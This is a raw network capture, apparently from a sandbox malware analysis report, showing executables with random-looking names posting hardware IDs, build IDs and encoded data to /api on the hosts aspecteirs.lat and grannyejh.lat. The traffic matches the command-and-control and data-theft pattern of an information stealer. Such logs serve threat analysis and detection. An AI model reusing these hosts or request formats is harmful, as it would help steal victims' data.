                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC250INData Raw: 34 39 31 63 0d 0a 31 6e 56 38 72 66 64 32 48 56 44 56 31 45 30 53 4a 2b 6a 44 79 48 6e 2f 64 74 33 48 44 61 64 73 70 32 47 71 49 61 4f 74 5a 35 43 74 56 77 71 50 7a 55 49 78 63 71 61 78 62 79 68 54 6d 72 61 74 56 64 30 58 75 65 55 33 77 51 33 4c 45 73 38 4e 67 64 73 4b 73 75 77 54 48 63 47 45 45 7a 46 79 73 4b 78 76 4b 48 79 54 34 61 30 58 33 55 7a 2f 6f 6d 66 46 44 63 73 44 79 30 72 4d 33 51 76 7a 76 68 6b 62 78 5a 49 56 65 54 47 35 75 53 68 33 51 6f 6d 70 70 68 43 53 48 72 44 6c 49 59 55 4a 33 55 4f 51 41 2b 37 49 45 2f 47 62 46 41 2f 47 31 51 73 78 4b 2f 65 78 49 7a 41 64 79 71 4b 74 47 35 4d 51 75 61 78 6c 7a 77 54 44 41 73 35 4c 30 38 51 42 2b 4c 34 58 47 4d 53 59 48 47 30 38 73 37 34 6a 63 55 69 4a 34 65 52 62 6d 67 7a 2f 2f 53 2b 57
                                                                                                                                                                                                                                                          Data Ascii: 491c1nV8rfd2HVDV1E0SJ+jDyHn/dt3HDadsp2GqIaOtZ5CtVwqPzUIxcqaxbyhTmratVd0XueU3wQ3LEs8NgdsKsuwTHcGEEzFysKxvKHyT4a0X3Uz/omfFDcsDy0rM3QvzvhkbxZIVeTG5uSh3QompphCSHrDlIYUJ3UOQA+7IE/GbFA/G1QsxK/exIzAdyqKtG5MQuaxlzwTDAs5L08QB+L4XGMSYHG08s74jcUiJ4eRbmgz//S+W
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 50 4d 59 53 32 56 62 4d 33 77 4f 79 71 31 6b 48 6a 35 49 59 50 32 72 33 76 69 4e 2b 51 49 6d 75 72 52 71 64 42 72 43 6c 62 4d 30 47 77 51 6e 48 54 4d 37 42 44 2f 57 38 48 68 6e 41 6b 68 78 35 50 62 54 32 59 54 42 43 6b 75 48 79 57 37 30 45 76 4b 5a 37 79 42 2b 46 48 49 5a 61 67 63 67 4a 73 75 78 58 47 4d 47 55 47 58 38 67 76 37 30 6b 64 56 65 42 71 4b 63 57 6e 52 6d 31 71 6d 7a 46 43 63 38 4a 78 30 6e 46 77 67 6a 30 74 42 64 65 67 64 55 54 5a 33 4c 76 39 67 78 31 56 59 32 74 76 46 6d 6e 56 4b 44 72 64 6f 55 4a 79 55 4f 51 41 38 6e 4b 42 76 47 2f 47 42 33 48 6e 67 5a 2f 49 4c 47 37 4b 6d 4a 44 6a 36 2b 67 47 49 38 65 73 61 4e 73 7a 41 58 4d 42 73 39 48 67 59 46 46 39 61 78 58 52 6f 2b 30 47 58 51 2b 76 61 45 76 4d 46 72 45 75 4f 6f 63 6b 56 54 6e 35 57 76
                                                                                                                                                                                                                                                          Data Ascii: PMYS2VbM3wOyq1kHj5IYP2r3viN+QImurRqdBrClbM0GwQnHTM7BD/W8HhnAkhx5PbT2YTBCkuHyW70EvKZ7yB+FHIZagcgJsuxXGMGUGX8gv70kdVeBqKcWnRm1qmzFCc8Jx0nFwgj0tBdegdUTZ3Lv9gx1VY2tvFmnVKDrdoUJyUOQA8nKBvG/GB3HngZ/ILG7KmJDj6+gGI8esaNszAXMBs9HgYFF9axXRo+0GXQ+vaEvMFrEuOockVTn5Wv
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 59 68 45 32 59 39 64 73 70 34 55 43 73 79 66 56 6b 6f 78 75 62 67 6f 5a 67 57 56 37 37 4e 62 6d 68 6a 2f 2f 53 2f 49 44 38 30 46 32 6b 7a 4d 7a 41 76 38 75 78 49 52 78 35 55 55 63 6a 65 7a 76 53 52 7a 53 49 36 7a 6f 42 75 56 45 62 36 76 5a 59 56 41 68 51 54 51 41 35 6d 50 4e 4f 57 2f 56 53 76 4d 6d 78 70 34 4a 50 65 70 59 57 6b 46 6a 61 33 71 51 39 30 5a 74 36 42 71 79 67 2f 50 44 63 31 4a 7a 63 63 4c 38 61 59 59 47 73 2b 5a 48 48 55 2f 75 62 49 6e 65 55 36 42 70 36 6f 61 6c 31 54 78 35 57 6a 64 54 70 31 44 2f 45 54 4e 77 67 71 77 67 52 51 51 77 5a 49 43 50 79 33 35 72 32 39 33 53 63 72 35 36 68 65 55 46 4c 53 76 61 38 55 4a 79 41 62 4c 52 4d 4c 43 41 76 69 36 45 42 72 44 6e 42 6c 35 4d 72 43 79 4b 6d 4a 41 67 36 32 6d 57 39 4e 55 75 4c 30 76 6e 55 37 71
                                                                                                                                                                                                                                                          Data Ascii: YhE2Y9dsp4UCsyfVkoxubgoZgWV77Nbmhj//S/ID80F2kzMzAv8uxIRx5UUcjezvSRzSI6zoBuVEb6vZYVAhQTQA5mPNOW/VSvMmxp4JPepYWkFja3qQ90Zt6Bqyg/PDc1JzccL8aYYGs+ZHHU/ubIneU6Bp6oal1Tx5WjdTp1D/ETNwgqwgRQQwZICPy35r293Scr56heUFLSva8UJyAbLRMLCAvi6EBrDnBl5MrCyKmJAg62mW9NUuL0vnU7q
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 6d 50 44 50 75 6d 47 52 44 47 6d 42 4a 33 4e 62 6d 37 4a 48 5a 4f 6a 61 61 73 46 70 55 5a 75 71 5a 75 77 51 54 58 41 4d 4e 4a 7a 4d 56 46 76 50 51 51 42 6f 2f 4e 56 46 67 2b 6e 71 59 30 59 6c 50 4b 76 75 51 43 33 52 4f 7a 35 54 65 46 44 63 6f 4b 78 30 76 4a 77 41 72 32 75 68 45 59 77 70 41 62 64 53 43 2f 75 43 4a 37 53 6f 47 7a 71 68 61 5a 47 4c 75 74 5a 4d 39 4f 69 30 50 50 57 34 47 58 52 63 65 35 47 42 37 4d 67 31 52 67 66 4b 37 32 4b 48 77 46 30 75 47 6d 46 5a 30 62 73 36 6c 6b 7a 51 2f 4a 44 63 39 47 79 4d 63 4e 34 4c 55 54 46 73 36 62 47 33 34 32 73 72 4d 72 64 30 47 4d 72 75 70 56 33 52 4f 6e 35 54 65 46 49 65 49 32 69 6d 4c 37 6a 78 71 38 72 56 63 5a 77 39 56 4d 50 7a 36 30 75 69 64 2f 51 34 4f 74 6f 42 4b 57 47 4c 53 68 59 38 77 4c 77 77 4c 4e 52
                                                                                                                                                                                                                                                          Data Ascii: mPDPumGRDGmBJ3Nbm7JHZOjaasFpUZuqZuwQTXAMNJzMVFvPQQBo/NVFg+nqY0YlPKvuQC3ROz5TeFDcoKx0vJwAr2uhEYwpAbdSC/uCJ7SoGzqhaZGLutZM9Oi0PPW4GXRce5GB7Mg1RgfK72KHwF0uGmFZ0bs6lkzQ/JDc9GyMcN4LUTFs6bG342srMrd0GMrupV3ROn5TeFIeI2imL7jxq8rVcZw9VMPz60uid/Q4OtoBKWGLShY8wLwwLNR
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 37 70 68 6b 54 77 4a 30 63 64 6a 4f 7a 73 79 4a 32 53 59 43 67 72 52 57 54 48 50 2f 72 4c 38 49 57 68 56 75 49 59 74 48 55 46 2b 53 35 4e 68 50 41 31 51 73 78 4b 2f 65 78 49 7a 41 64 79 71 69 34 48 35 41 47 74 71 4a 68 79 67 33 58 41 73 56 49 30 38 67 4b 39 72 4d 62 47 4d 43 54 46 58 6f 34 75 37 45 71 65 30 71 47 34 65 52 62 6d 67 7a 2f 2f 53 2f 72 42 64 59 55 79 30 33 4b 32 52 36 79 71 31 6b 48 6a 35 49 59 50 32 72 33 74 53 52 37 51 59 71 74 71 68 2b 51 46 4b 32 71 61 4d 49 48 7a 68 48 43 52 4d 62 45 44 66 6d 37 45 51 7a 44 6d 77 5a 36 49 4b 58 32 59 54 42 43 6b 75 48 79 57 36 73 54 72 37 56 73 68 7a 2f 54 41 4e 35 49 7a 4d 4e 46 37 66 6f 4f 58 73 69 5a 56 43 64 79 73 62 6b 6d 63 30 71 4c 71 4b 59 57 6d 42 32 36 70 47 6e 42 42 4d 38 44 7a 6b 58 41 79 67
                                                                                                                                                                                                                                                          Data Ascii: 7phkTwJ0cdjOzsyJ2SYCgrRWTHP/rL8IWhVuIYtHUF+S5NhPA1QsxK/exIzAdyqi4H5AGtqJhyg3XAsVI08gK9rMbGMCTFXo4u7Eqe0qG4eRbmgz//S/rBdYUy03K2R6yq1kHj5IYP2r3tSR7QYqtqh+QFK2qaMIHzhHCRMbEDfm7EQzDmwZ6IKX2YTBCkuHyW6sTr7Vshz/TAN5IzMNF7foOXsiZVCdysbkmc0qLqKYWmB26pGnBBM8DzkXAyg
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 45 6f 2f 4e 56 48 77 31 74 4c 63 6c 65 55 6d 46 70 71 34 4a 6c 78 4f 74 70 47 37 4f 41 38 6b 44 78 55 37 4c 7a 67 7a 2f 75 42 6f 5a 79 4a 6f 52 50 33 7a 33 73 54 63 77 48 63 71 41 70 78 43 52 54 2b 58 6c 63 49 73 58 68 51 54 45 41 35 6d 50 42 66 69 78 48 52 50 4d 6d 68 64 74 4d 37 47 6b 4c 33 31 50 6d 4b 75 68 48 70 41 5a 73 71 5a 70 77 77 58 4a 45 63 46 44 77 73 52 46 76 50 51 51 42 6f 2f 4e 56 46 77 6c 6f 62 77 6f 66 46 4f 42 6f 4b 6b 4e 6b 41 54 2f 36 79 2f 55 43 64 52 44 6b 46 58 52 32 41 4c 74 2b 67 35 65 79 4a 6c 55 4a 33 4b 78 76 79 6c 33 51 34 53 7a 72 78 32 53 47 37 61 73 61 38 30 4e 78 51 66 4d 52 4d 54 4d 43 66 6d 7a 46 42 48 4c 6e 42 70 32 50 66 66 34 62 33 64 64 79 76 6e 71 4f 6f 59 58 73 36 67 76 32 6b 44 63 51 38 39 50 67 5a 64 46 2f 72 6f
                                                                                                                                                                                                                                                          Data Ascii: Eo/NVHw1tLcleUmFpq4JlxOtpG7OA8kDxU7Lzgz/uBoZyJoRP3z3sTcwHcqApxCRT+XlcIsXhQTEA5mPBfixHRPMmhdtM7GkL31PmKuhHpAZsqZpwwXJEcFDwsRFvPQQBo/NVFwlobwofFOBoKkNkAT/6y/UCdRDkFXR2ALt+g5eyJlUJ3Kxvyl3Q4Szrx2SG7asa80NxQfMRMTMCfmzFBHLnBp2Pff4b3ddyvnqOoYXs6gv2kDcQ89PgZdF/ro
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 78 46 34 4a 50 57 44 4c 48 35 4c 6a 62 66 71 42 4b 4a 61 2f 36 70 31 68 56 62 38 47 6f 68 45 7a 59 39 64 73 71 45 51 48 73 69 50 41 6e 67 2b 70 72 30 69 66 47 65 46 70 72 77 59 6b 68 65 75 72 43 50 4f 41 34 56 4e 69 45 54 5a 6a 31 32 79 6d 78 41 49 7a 4c 6f 58 62 6a 76 33 2b 47 39 33 55 38 72 35 36 69 58 64 42 72 79 31 62 4d 6f 66 2b 30 4f 51 57 76 2b 50 44 75 53 7a 42 78 33 5a 6e 68 6c 7a 49 34 6e 32 64 79 51 58 32 50 50 34 53 59 4a 55 6f 4a 6f 68 68 51 2b 46 57 2f 46 61 67 64 6c 46 71 75 5a 5a 58 74 33 56 54 44 39 31 74 4b 51 39 64 6b 61 63 6f 75 30 6c 6f 7a 4f 70 72 32 6a 56 43 64 49 4d 69 41 32 42 77 45 57 71 6a 56 63 58 79 49 34 46 61 54 2b 6e 73 57 39 50 43 38 71 35 36 6b 50 64 49 62 79 72 59 63 49 59 31 45 37 76 56 63 76 49 46 66 57 6a 47 46 36 42
                                                                                                                                                                                                                                                          Data Ascii: xF4JPWDLH5LjbfqBKJa/6p1hVb8GohEzY9dsqEQHsiPAng+pr0ifGeFprwYkheurCPOA4VNiETZj12ymxAIzLoXbjv3+G93U8r56iXdBry1bMof+0OQWv+PDuSzBx3ZnhlzI4n2dyQX2PP4SYJUoJohhQ+FW/FagdlFquZZXt3VTD91tKQ9dkacou0lozOpr2jVCdIMiA2BwEWqjVcXyI4FaT+nsW9PC8q56kPdIbyrYcIY1E7vVcvIFfWjGF6B
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 4b 77 70 6a 6c 72 43 59 4b 69 73 41 47 6a 4b 70 53 70 61 63 49 55 77 67 58 75 59 34 47 42 52 66 33 30 54 79 65 50 33 56 52 41 66 50 65 75 62 79 67 46 76 36 4b 6b 46 5a 6f 43 72 75 68 48 35 6a 54 2f 51 65 52 45 31 49 30 78 39 61 51 47 46 63 4b 5a 56 44 46 79 73 66 5a 33 49 41 76 4b 70 62 74 62 78 55 54 74 2f 6a 71 57 57 5a 56 52 31 77 33 59 6a 78 4f 79 37 45 56 51 6a 34 64 55 4a 33 4c 77 74 54 31 69 51 34 6d 33 71 56 79 6a 4b 70 69 72 61 4d 51 59 31 52 54 48 66 66 2f 61 42 76 79 36 45 41 6a 65 31 56 6f 2f 50 66 66 75 46 6a 41 4e 79 70 37 6b 57 34 56 55 35 2b 56 61 78 67 44 4c 42 4e 35 53 6a 4f 67 4c 39 62 55 42 44 74 69 61 56 44 46 79 73 66 5a 33 49 67 76 4b 70 62 74 62 78 55 54 74 2f 6a 71 57 57 5a 56 52 31 77 33 59 6a 78 4f 79 37 45 56 51 6a 34 64 55 4a
                                                                                                                                                                                                                                                          Data Ascii: KwpjlrCYKisAGjKpSpacIUwgXuY4GBRf30TyeP3VRAfPeubygFv6KkFZoCruhH5jT/QeRE1I0x9aQGFcKZVDFysfZ3IAvKpbtbxUTt/jqWWZVR1w3YjxOy7EVQj4dUJ3LwtT1iQ4m3qVyjKpiraMQY1RTHff/aBvy6EAje1Vo/PffuFjANyp7kW4VU5+VaxgDLBN5SjOgL9bUBDtiaVDFysfZ3IgvKpbtbxUTt/jqWWZVR1w3YjxOy7EVQj4dUJ
                                                                                                                                                                                                                                                          2024-12-19 13:21:34 UTC1369INData Raw: 73 4d 41 76 4b 72 65 70 44 33 52 57 31 74 57 4c 4b 43 59 6b 45 30 6b 53 42 67 55 58 38 39 45 39 65 7a 70 38 45 63 6a 32 77 2b 69 6c 2b 53 38 71 2b 35 41 4c 64 41 76 2f 39 50 49 74 4f 31 30 4f 51 41 34 62 4d 46 2b 43 79 46 41 6a 4d 30 69 70 42 48 36 57 78 50 33 4d 48 75 36 79 75 44 59 67 58 72 36 4a 52 2b 79 50 58 42 4e 68 41 67 2f 34 54 38 62 51 5a 47 59 2f 62 56 47 64 79 37 2f 59 43 59 6b 4b 61 6f 75 70 56 33 52 6a 2f 2f 53 2f 49 48 4d 49 54 79 77 2f 47 31 51 4b 79 71 31 6b 48 6a 34 4e 55 4a 32 48 35 39 6a 30 77 48 63 72 6d 70 42 61 63 46 37 47 6d 66 64 63 49 78 68 58 4c 42 50 2f 78 4b 4f 43 7a 42 78 32 4e 70 42 6c 37 4a 4b 4b 31 50 33 64 37 74 49 79 34 48 49 30 58 2f 59 6c 6f 79 41 4c 37 50 66 39 53 78 74 39 48 31 4c 63 42 48 59 2f 62 56 47 64 79 37 2f
                                                                                                                                                                                                                                                          Data Ascii: sMAvKrepD3RW1tWLKCYkE0kSBgUX89E9ezp8Ecj2w+il+S8q+5ALdAv/9PItO10OQA4bMF+CyFAjM0ipBH6WxP3MHu6yuDYgXr6JR+yPXBNhAg/4T8bQZGY/bVGdy7/YCYkKaoupV3Rj//S/IHMITyw/G1QKyq1kHj4NUJ2H59j0wHcrmpBacF7GmfdcIxhXLBP/xKOCzBx2NpBl7JKK1P3d7tIy4HI0X/YloyAL7Pf9Sxt9H1LcBHY/bVGdy7/


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          28192.168.2.449919104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:37 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=57X45FEKRE48XWH4VZV
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18172
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:37 UTC15331OUTData Raw: 2d 2d 35 37 58 34 35 46 45 4b 52 45 34 38 58 57 48 34 56 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 37 58 34 35 46 45 4b 52 45 34 38 58 57 48 34 56 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 37 58 34 35 46 45 4b 52 45 34 38 58 57 48 34 56 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e
                                                                                                                                                                                                                                                          Data Ascii: --57X45FEKRE48XWH4VZVContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--57X45FEKRE48XWH4VZVContent-Disposition: form-data; name="pid"2--57X45FEKRE48XWH4VZVContent-Disposition: form-data; name="lid"CVmr0t--in
                                                                                                                                                                                                                                                          2024-12-19 13:21:37 UTC2841OUTData Raw: ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70
                                                                                                                                                                                                                                                          Data Ascii: e,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)p
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p1hnlhp5bbo6l3ghqaht4fm3or; expires=Mon, 14 Apr 2025 07:08:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdp6t%2Fi93mMMWMN8k06Y0Fvq4o%2BOoJVqKmkjVzxWrBb6tunf8mIksUKIkENXK30GWdOs1a%2B6T%2Fx2inybXNVWwlpEIXJUMV7D4nIgRRZ%2BhVuYaML1dfm9NStuhsTncHtWCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2637d0672b7-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2020&rtt_var=785&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19133&delivery_rate=1370892&cwnd=192&unsent_bytes=0&cid=244877f8e5d9ce37&ts=1246&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          29192.168.2.449921104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 87
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d 26 68 77 69 64 3d 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6989783370&j=&hwid=4D9AEFC7455232AC00D57F9DDD37BE0C
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=6o62unggm4kvgu91ibed6lni36; expires=Mon, 14 Apr 2025 07:08:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2xJ6O4OcUKX0eeJw4ndKr2vSBU1qoSf8EYt%2Fy%2BugnLWCbnVo2QAUzcvggXiLMu%2BVJwLdauj7DT52Gu6nqvko1n3qGd%2FsbRdedq3%2FddCWLbKOUqWDvR4Lpbj2zbSuSTh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b266984d43ee-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2087&rtt_var=801&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=984&delivery_rate=1399137&cwnd=230&unsent_bytes=0&cid=8846d043b04e86bf&ts=784&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC54INData Raw: 33 30 0d 0a 6a 77 66 52 39 79 71 6a 31 52 49 33 79 59 43 7a 49 47 48 2f 41 75 71 6c 45 6f 72 72 54 69 6e 52 49 2b 70 6f 31 69 67 5a 79 4c 50 55 57 67 3d 3d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 30jwfR9yqj1RI3yYCzIGH/AuqlEorrTinRI+po1igZyLPUWg==
                                                                                                                                                                                                                                                          2024-12-19 13:21:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          30192.168.2.449928104.21.66.854437112C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:40 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=9J14C9QXH0F3KYMV4IF
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8793
                                                                                                                                                                                                                                                          Host: aspecteirs.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:40 UTC8793OUTData Raw: 2d 2d 39 4a 31 34 43 39 51 58 48 30 46 33 4b 59 4d 56 34 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 4a 31 34 43 39 51 58 48 30 46 33 4b 59 4d 56 34 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 4a 31 34 43 39 51 58 48 30 46 33 4b 59 4d 56 34 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e
                                                                                                                                                                                                                                                          Data Ascii: --9J14C9QXH0F3KYMV4IFContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--9J14C9QXH0F3KYMV4IFContent-Disposition: form-data; name="pid"2--9J14C9QXH0F3KYMV4IFContent-Disposition: form-data; name="lid"CVmr0t--in
                                                                                                                                                                                                                                                          2024-12-19 13:21:41 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:41 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=oka39cbeu6pm45aokt163p1guc; expires=Mon, 14 Apr 2025 07:08:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
